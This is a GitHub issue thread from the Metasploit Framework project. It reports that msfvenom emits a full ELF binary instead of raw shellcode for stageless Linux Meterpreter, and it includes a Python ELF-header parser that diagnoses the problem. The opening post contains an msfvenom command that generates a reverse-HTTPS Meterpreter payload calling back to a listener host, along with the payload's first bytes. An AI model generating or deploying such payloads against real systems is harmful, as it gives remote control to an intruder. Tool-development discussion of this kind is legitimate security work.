rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

ELF Binary for Linux payloads instead of ShellCode #10893

Closed mubix closed 3 years ago

mubix commented 5 years ago

Steps to reproduce

How'd you do it?

# ./msfvenom -a x86 --platform linux -p linux/x86/meterpreter_reverse_https LHOST=192.168.1.100 LPORT=443 -f c | head -n 50
No encoder or badchars specified, outputting raw payload
Payload size: 961872 bytes
Final size of c file: 4039887 bytes
unsigned char buf[] =
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x03\x00\x03\x00\x01\x00\x00\x00\xb2\x4a\x00\x00\x34\x00"
"\x00\x00\xa0\xa8\x0e\x00\x00\x00\x00\x00\x34\x00\x20\x00\x05"
"\x00\x28\x00\x1e\x00\x1b\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x28\x20\x0c\x00\x28\x20\x0c"

This section should also tell us any relevant information about the environment; for example, if an exploit that used to work is failing, tell us the victim operating system and service versions.

Expected behavior

What should happen? SHELLCODE

Current behavior

What happens instead? ELF

System stuff

Metasploit version

af61e075363b9165f81c6d92921d4d87375114f3 Weekly dependency update

I installed Metasploit with:

OS

What OS are you running Metasploit on?

Debian 9

mubix commented 5 years ago

As talked about on Slack, the short-term fix is to warn users that the output isn't shellcode but an ELF binary, and should be treated as such instead of as shellcode to be used.

busterb commented 5 years ago

Stageless mettle falls through a special case in the payload generator currently, since we actually just package the elf file generated by the compiler during the build process, as opposed to inserting the entirety of the stageless payload into a template binary.

This made it easy to support the number of architectures it supports without having to write an ELF injector for all of them right away, but it does mean that it's kind of cheating and not actually delivering the payload as real shellcode. I think it could, especially for the msfvenom case at least, since we do have the .bin images and loaders for a handful of architectures. We'd just need to restrict it so that the ones we don't have loaders for are not generable for non-ELF.
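The two points above, mubix's proposed warning (the output is an ELF, not shellcode) and busterb's explanation that stageless mettle is the compiler's whole ELF packaged as-is, can both be checked against the bytes quoted in the issue. The following is an added example written for this page, not Metasploit or msfvenom code. It parses the ELF file header from the first 75 bytes of the quoted `-f c` output, confirms that the section header table ends exactly at the reported "Payload size" (i.e. the blob is a complete ELF file rather than a code stub), and produces the kind of warning a generator could print. The `SAMPLE_RAW` bytes are a constructed non-ELF stand-in, and the `E_MACHINE` table is a small subset of the ELF specification's values.

```python
import struct

ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2   # e_ident[EI_CLASS]
ELFDATA2LSB = 1                 # e_ident[EI_DATA]: little-endian
E_TYPE = {1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
# Subset of e_machine values from the ELF spec (assumption: enough for this demo)
E_MACHINE = {3: "EM_386", 8: "EM_MIPS", 40: "EM_ARM", 62: "EM_X86_64", 183: "EM_AARCH64"}

# First 75 bytes of the `-f c` output quoted in the issue, copied verbatim.
SAMPLE_ELF = (
    b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x03\x00\x03\x00\x01\x00\x00\x00\xb2\x4a\x00\x00\x34\x00"
    b"\x00\x00\xa0\xa8\x0e\x00\x00\x00\x00\x00\x34\x00\x20\x00\x05"
    b"\x00\x28\x00\x1e\x00\x1b\x00\x01\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x28\x20\x0c\x00\x28\x20\x0c"
)
SAMPLE_PAYLOAD_SIZE = 961872  # "Payload size" line from the same msfvenom run

# Constructed stand-in for raw position-independent code (nop, nop, int3); not an ELF.
SAMPLE_RAW = b"\x90\x90\xcc"


def parse_elf_header(blob):
    """Return the ELF file header as a dict, or None if blob does not start with one."""
    if len(blob) < 16 or blob[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = blob[4], blob[5]
    endian = "<" if ei_data == ELFDATA2LSB else ">"
    # Field order after e_ident: e_type e_machine e_version e_entry e_phoff e_shoff
    # e_flags e_ehsize e_phentsize e_phnum e_shentsize e_shnum e_shstrndx
    if ei_class == ELFCLASS32:
        fmt = endian + "HHIIIIIHHHHHH"
    elif ei_class == ELFCLASS64:
        fmt = endian + "HHIQQQIHHHHHH"
    else:
        return None
    if len(blob) < 16 + struct.calcsize(fmt):
        return None  # truncated header
    names = ("e_type", "e_machine", "e_version", "e_entry", "e_phoff", "e_shoff",
             "e_flags", "e_ehsize", "e_phentsize", "e_phnum", "e_shentsize",
             "e_shnum", "e_shstrndx")
    hdr = dict(zip(names, struct.unpack_from(fmt, blob, 16)))
    hdr["bits"] = 32 if ei_class == ELFCLASS32 else 64
    hdr["little_endian"] = ei_data == ELFDATA2LSB
    return hdr


def expected_file_size(hdr):
    """Offset just past the section header table; for a complete ELF file this equals its size."""
    return hdr["e_shoff"] + hdr["e_shnum"] * hdr["e_shentsize"]


def classify_payload(blob, payload_size=None):
    """Return ("elf", hdr) when blob is a packaged ELF image, ("raw", None) otherwise.

    When the generator's reported payload size is given, hdr["complete_file"] records
    whether the section header table ends exactly at that size.
    """
    hdr = parse_elf_header(blob)
    if hdr is None:
        return ("raw", None)
    if payload_size is not None:
        hdr["complete_file"] = expected_file_size(hdr) == payload_size
    return ("elf", hdr)


def warning_for(blob, payload_size=None):
    """The warning a generator could print in front of a packaged ELF; empty for raw code."""
    kind, hdr = classify_payload(blob, payload_size)
    if kind != "elf":
        return ""
    machine = E_MACHINE.get(hdr["e_machine"], hex(hdr["e_machine"]))
    etype = E_TYPE.get(hdr["e_type"], hex(hdr["e_type"]))
    return ("WARNING: output is an ELF image ({}-bit {} {}, entry 0x{:x}, {} program headers), "
            "not position-independent shellcode; treat it as an executable file."
            .format(hdr["bits"], machine, etype, hdr["e_entry"], hdr["e_phnum"]))


if __name__ == "__main__":
    print(warning_for(SAMPLE_ELF, SAMPLE_PAYLOAD_SIZE))
    print(classify_payload(SAMPLE_RAW))
```

On the quoted bytes this reports a 32-bit little-endian `EM_386` `ET_DYN` image with 5 program headers, and `e_shoff + e_shnum * e_shentsize` comes out to exactly 961872, matching the "Payload size" line: the generator emitted the entire mettle ELF file, which is what makes a magic-byte check a sufficient trigger for the warning.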

mubix commented 5 years ago

@busterb that would be awesome. Currently trying to generate Linux shellcode for a project and having a ton of issues trying to scrape it out of the code, so any hints on how to do that in the meantime would be greatly appreciated.

wvu commented 5 years ago

@mubix: Can you get by with stager shellcode? Or does it have to be stageless?

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 3 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.